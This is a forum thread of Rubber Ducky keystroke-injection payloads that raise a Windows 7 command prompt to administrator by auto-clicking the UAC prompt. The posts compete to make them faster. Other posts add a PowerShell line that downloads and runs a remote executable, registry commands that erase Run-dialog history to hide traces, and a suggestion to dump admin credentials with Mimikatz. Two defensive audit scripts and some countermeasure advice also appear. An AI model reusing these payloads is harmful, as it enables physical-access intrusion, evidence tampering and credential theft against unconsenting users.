
[Payload] Faster UAC Bypass


Darren Kitchen


The duck is pretty good at bypassing UAC. Let's make it better.

REM *********************************
REM Payload: Old Method to Bypass UAC
REM Target: Windows 7
REM Author: Darren Kitchen
REM *********************************
GUI
DELAY 500
STRING cmd
DELAY 3000
MENU
DELAY 2000
STRING a
REM *************************************************************
REM Depending on Windows Version an ENTER could be necessary here
REM *************************************************************
DELAY 3000
LEFT
ENTER
DELAY 500
STRING echo Admin Prompt in 9 seconds

Not bad. Let's shave another 2 seconds off...

REM ********************************
REM Payload: Less Finicky UAC Bypass
REM Target: Windows 7
REM Author: Darren Kitchen
REM ********************************
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING copy con sudo.cmd
ENTER
STRING @echo Set objShell = CreateObject("Shell.Application") > %temp%\sudo.tmp.vbs
ENTER
STRING @echo args = Right("%*", (Len("%*") - Len("%1"))) >> %temp%\sudo.tmp.vbs
ENTER
STRING @echo objShell.ShellExecute "%1", args, "", "runas" >> %temp%\sudo.tmp.vbs
ENTER
STRING @cscript %temp%\sudo.tmp.vbs
ENTER
CTRL z
ENTER
STRING sudo.cmd cmd
ENTER
DELAY 3000
ALT y
DELAY 500
STRING echo Admin Prompt in 7 seconds

Not bad. Let's shave another 2 seconds off...

REM ********************************************
REM Payload: Fastest UAC Bypass using Powershell
REM Target: Windows 7
REM Author: Darren Kitchen
REM ********************************************
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 3000
ALT y
DELAY 500
STRING echo Admin Prompt in 5 seconds

Not bad. Let's shave another 2 seconds off...?

Thoughts?


BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Which is why....

powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%temp%\bob.exe'); Start-Process "%temp%\bob.exe"

However cool, it still doesn't open a command prompt bypassing UAC.


I found a website that has a way to turn off UAC by command line. Don't know if UAC will still bug you during the turn off procedure though.

http://www.howtogeek.com/howto/windows-vista/enable-or-disable-uac-from-the-windows-vista-command-line/

Unfortunately, this method requires a reboot. Though it does completely disable UAC rather than just a one-off.


The countermeasure to this is, of course, don't run as admin, so that every time UAC pops up you have to put your admin password in. This is how a corporate desktop should be configured anyway, (or with UAC off and non-admin accounts for the staff).

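As an added defensive check (not code from this thread), here is a PowerShell audit of the state the post above recommends: the interactive user is not a local administrator, UAC is on, and any elevation asks for credentials rather than a Yes/No click. It assumes the documented UAC policy values under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System.

```powershell
# Added example, not code from the thread: audit whether a workstation matches
# the countermeasure described above (standard user, UAC on, elevation prompts
# for credentials). Key and value names are the documented UAC policy settings.
$policyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$uac = Get-ItemProperty -Path $policyKey

# BUILTIN\Administrators (S-1-5-32-544) stays in the token's group list even
# when UAC has filtered it to deny-only, so this catches "admin with UAC on".
$groupSids = [Security.Principal.WindowsIdentity]::GetCurrent().Groups |
    ForEach-Object { $_.Value }
$isLocalAdmin = $groupSids -contains 'S-1-5-32-544'

# ConsentPromptBehaviorAdmin: 0 = elevate silently, 1/3 = ask for credentials,
# 2/4/5 = consent prompt (a Yes/No click, which a single keystroke can answer).
$adminConsentOnly = @(2, 4, 5) -contains $uac.ConsentPromptBehaviorAdmin

$findings = New-Object System.Collections.Generic.List[string]
if ($uac.EnableLUA -ne 1) {
    $findings.Add('FINDING: UAC is disabled (EnableLUA is not 1); admin logons are fully elevated.')
}
if ($isLocalAdmin) {
    $findings.Add('FINDING: Interactive user is a member of the local Administrators group.')
    if ($uac.ConsentPromptBehaviorAdmin -eq 0) {
        $findings.Add('FINDING: Admin elevation is silent (ConsentPromptBehaviorAdmin = 0).')
    } elseif ($adminConsentOnly) {
        $findings.Add('FINDING: Admin elevation needs only a consent click, not a password.')
    }
}
# ConsentPromptBehaviorUser: 0 = standard users are auto-denied, 1/3 = they are
# asked for an administrator's credentials (the behaviour the post describes).
if ($uac.ConsentPromptBehaviorUser -eq 0) {
    $findings.Add('INFO: Standard users cannot elevate at all (ConsentPromptBehaviorUser = 0).')
}

if ($findings.Count -eq 0) {
    Write-Output 'OK: standard user, UAC on, elevation requires admin credentials.'
} else {
    $findings | ForEach-Object { Write-Output $_ }
}
```

Run it in the context of the interactive user being audited, since the group check reads that user's own token.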

Emphasis mine.

Too true Darren I know, last company I was at doing a quick audit, they had Windows 7 and half the staff were running as admin with UAC on, the other half as admin with UAC disabled, because, you know, it's such a bind to click "Yes" every now and again.



Having powershell Start-Process cmd.exe -Verb runAs as the last run command in the run prompt would make me suspicious if I saw it. Is there any way you can clean up afterwards to remove the obvious trace?


You can delete the entire history from the Run dialog using

reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f

or, you can specify what exact command you want removed with this:

for /f "tokens=1 delims= " %%A in ('reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU ^| findstr /I /C:"powershell Start-Process cmd.exe -Verb RunAs"') do (reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /v %%A /f)

or change "powershell Start-Process cmd.exe -Verb RunAs" to anything you like.

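For the defender's side of the same key, here is an added PowerShell example (not from this thread) that lists the Run-dialog history in most-recent-first order, flags entries that request elevation, and notes when the key or its MRUList is missing, which is what the deletion above leaves behind. The elevation patterns are my own assumptions based on the commands discussed in this thread.

```powershell
# Added example, not code from the thread: inspect RunMRU rather than wipe it.
# Each value (a, b, c, ...) holds a command with a trailing "\1"; MRUList gives
# their recency order, most recent letter first. Patterns below are assumptions.
$mruKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
$elevationPatterns = @(
    'Start-Process\s.*-Verb\s+runas',   # PowerShell elevation
    '^runas\s',                         # runas.exe
    'ShellExecute.*"runas"'             # Shell.Application verb
)

if (-not (Test-Path $mruKey)) {
    Write-Output 'RunMRU key is absent: no Run history, or the key was deleted.'
    return
}
$mru = Get-ItemProperty -Path $mruKey
$order = [string]$mru.MRUList            # e.g. 'cba' means c is most recent
if (-not $order) {
    Write-Output 'RunMRU exists but MRUList is empty: history cleared (reg delete /va)?'
}
foreach ($name in $order.ToCharArray()) {
    $raw = [string]$mru.([string]$name)
    if (-not $raw) { continue }
    $cmd = $raw -replace '\\1$', ''      # strip the "\1" suffix Explorer appends
    $flag = ''
    foreach ($pat in $elevationPatterns) {
        if ($cmd -match $pat) { $flag = '  <-- requests elevation'; break }
    }
    Write-Output ('{0}: {1}{2}' -f $name, $cmd, $flag)
}
```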

CONTROL ESCAPE
DELAY 200
STRING cmd
CTRL-SHIFT ENTER
DELAY 2800
ALT y

Another 2 seconds shaved off. ;)

Edit: Better version using the Run menu. It should work when there are a lot of entries in the Start menu, and it doesn't put an unnecessary "y" in the CMD window if UAC is off.

GUI R
DELAY 200
STRING runas /profile /user:%COMPUTERNAME%\Administrator "cmd"
ENTER
DELAY 2700
ALT y
DELAY 100
BACKSPACE
Edited by SN4T14

  1. Press the Win keyboard key or click on the Vista Start button.
  2. Type cmd into the Start Search textbox.
  3. Press the Ctrl+Shift+Enter keyboard shortcut. Ctrl-Shift-Enter is the general keyboard shortcut that triggers elevation to “Run as Administrator”.
  4. Press Alt+C or press Continue to confirm the UAC elevation warning prompt.

http://www.mydigitallife.info/how-to-open-elevated-command-prompt-with-administrator-privileges-in-windows-vista/



The CTRL+SHIFT+ENTER combo works on the keyboard but how do you code that in Ducky Script? Can Ducky Script handle three keys being pressed simultaneously?

I tried this script earlier and it didn't work:

DEFAULTDELAY 50
DELAY 3000
CONTROL ESCAPE
STRING cmd
CONTROL SHIFT ENTER
ALT Y
EXIT



Firstly, when you refer to "Bypass" UAC, what you are really saying is don't bring up the dialog box saying "Do you want to run xyz program as Administrator?". What I think would be better is to get administrator rights from a guest user's perspective, just about guaranteeing that any program would work if you needed to execute it.

If I knew someone who was an administrator, I would simply write a ducky script using the CTRL-SHIFT-ENTER command to elevate Powershell, then use the "Invoke-Mimikatz" command with "-DumpCreds". This would output the administrator password for the computer (providing it is not a Windows 8/8.1 machine).

I know there is a way you can execute a task as another user... so if you knew the administrator password for a computer, you could simply rock up as a guest, and run the task as an admin user. Thoughts?
